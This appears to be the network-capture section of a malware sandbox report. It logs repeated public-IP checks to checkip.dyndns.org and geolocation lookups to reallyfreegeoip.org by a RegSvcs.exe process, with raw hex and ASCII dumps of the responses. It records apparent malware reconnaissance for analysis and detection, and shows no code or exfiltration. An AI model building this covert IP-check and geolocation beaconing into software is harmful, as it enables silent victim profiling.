                                                                                                                          Jan 10, 2025 23:44:27.292238951 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:27 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 7ae46441aeb8aaa84bde11dd3a7980f1
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                          Jan 10, 2025 23:44:28.038208008 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 10, 2025 23:44:28.192877054 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:28 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: b1a3e7fad1e5e5b0b6c56a7024b763c3
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          9192.168.2.449758158.101.44.242807924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:28.812019110 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 10, 2025 23:44:29.374680996 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:29 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: ee67bbf8cbb37d9ba41df32e8d6b387f
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          10192.168.2.449760158.101.44.242807924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:29.977925062 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 10, 2025 23:44:30.545660019 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:30 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 4403563652166d7cac26f799a00a1693
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          11192.168.2.449762158.101.44.242807924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:31.193432093 CET127OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Jan 10, 2025 23:44:31.771938086 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:31 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: ef9db2137cbfd62cbc8d7274f2cda811
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          12192.168.2.449764158.101.44.242807924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:32.508610010 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:33.083934069 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:33 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: cdf4af8b880144e6c864bdbad4b282b0
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          13192.168.2.449766158.101.44.242807924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:33.704691887 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:34.296876907 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:34 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 8c236a87bab09da06e8e32cdf4f9d1b0
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          14192.168.2.449768158.101.44.242807924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:34.939143896 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:35.528271914 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:35 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 87244418649ce1db501173995465e265
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          15192.168.2.449770158.101.44.242807924C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 10, 2025 23:44:36.152740955 CET151OUTGET / HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                          Host: checkip.dyndns.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 10, 2025 23:44:36.770400047 CET321INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:36 GMT
                                                                                                                          Content-Type: text/html
                                                                                                                          Content-Length: 104
                                                                                                                          Connection: keep-alive
                                                                                                                          Cache-Control: no-cache
                                                                                                                          Pragma: no-cache
                                                                                                                          X-Request-ID: 9730c03ac67da6984342fae21352b9a9
                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                          Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                          HTTPS Proxied Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.449732104.21.16.14437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:12 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:12 UTC855INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:12 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863841
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M6WpFb53XWljWqmrZJIcVzfRk63h3R%2F4Oe81GZnU6R8LkNvEgocUNSRbQnN3E7ZGvHwp0Oao%2BrbSfphU64Huw6MLj2QBM7HKfi25Ho941AyvuZXOxZGtaMhxvKu%2FcHv9FQ4GPQv6"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030b9d8c01899-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1619&min_rtt=1603&rtt_var=633&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1685912&cwnd=153&unsent_bytes=0&cid=2596f5d03d42cd26&ts=198&x=0"
                                                                                                                          2025-01-10 22:44:12 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.449733104.21.16.14437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:13 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:13 UTC855INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:13 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863842
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jcwfFbfiOcBDcIM84olnST3J%2F7f8LsIzl7rNpVd65HCoK6%2FX4ClH8zpM4FJuq3cFfwaGxcynDf4fPeXH7MmPCKz7JlUD2FP%2FOgxgyrli78k0Abj39prCSl8DzCMHm3RXDbO5k6EK"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030becd6c41ba-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1649&min_rtt=1648&rtt_var=620&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1763285&cwnd=192&unsent_bytes=0&cid=32647e85ec4a1550&ts=168&x=0"
                                                                                                                          2025-01-10 22:44:13 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.449735104.21.16.14437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:14 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:14 UTC859INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:14 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863843
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6em4ZGCcB6fgenm7GXm8rS4m3RH7KMvJ33ZJF2PjmbwYBnLi1uVCS%2FHWbtt8Y40otPsANjD1Y%2BpLQTnMgaavTXKP%2FlUFlmD7YaWWVKVvhiA88Rsrie7R7YevWs2CZQAP2KSv%2F%2BjM"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030c67efc0fa8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1486&min_rtt=1473&rtt_var=579&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1846932&cwnd=252&unsent_bytes=0&cid=3e9c05bc3540c596&ts=139&x=0"
                                                                                                                          2025-01-10 22:44:14 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.449737104.21.16.14437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:15 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          2025-01-10 22:44:15 UTC857INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:15 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863844
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=kUrhI93NHAadMYbm3QiVfswL21Ra5EHk9UKPgm9IqXeczOpMx%2Bxhx%2Bmvt80nYg1RybP9fn7SVshhd6tLoPzaE%2FKswpnrboIAY6gVIA0SmC9FnL1Yj%2BGlxGlydcTohV7TDf2UlIlP"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030ce2db77293-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2070&min_rtt=2042&rtt_var=785&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1429970&cwnd=158&unsent_bytes=0&cid=53b2f92b4c35cb41&ts=163&x=0"
                                                                                                                          2025-01-10 22:44:15 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                          Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.449739104.21.16.14437508C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-10 22:44:16 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                                          Host: reallyfreegeoip.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          2025-01-10 22:44:16 UTC865INHTTP/1.1 200 OK
                                                                                                                          Date: Fri, 10 Jan 2025 22:44:16 GMT
                                                                                                                          Content-Type: text/xml
                                                                                                                          Content-Length: 362
                                                                                                                          Connection: close
                                                                                                                          Age: 1863846
                                                                                                                          Cache-Control: max-age=31536000
                                                                                                                          cf-cache-status: HIT
                                                                                                                          last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NGei6oZbKPA%2BBFTUJSUxr0d2dd9gSX6ebSwbjURB9SSIqbRlSIZT84Xshs4ibCiQUv7%2FwBM7hX%2BEnmi%2FFBCXED1wNSyGuUV383nmy9%2BIjmyplHs7TL%2F%2BlwEJ3qY%2BqJrSAoEFCyP9"}],"group":"cf-nel","max_age":604800}
                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                          Server: cloudflare
                                                                                                                          CF-RAY: 900030d5a9420fa8-EWR
                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1491&min_rtt=1491&rtt_var=561&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1949265&cwnd=252&unsent_bytes=0&cid=a681fb5636e761a7&ts=153&x=0"
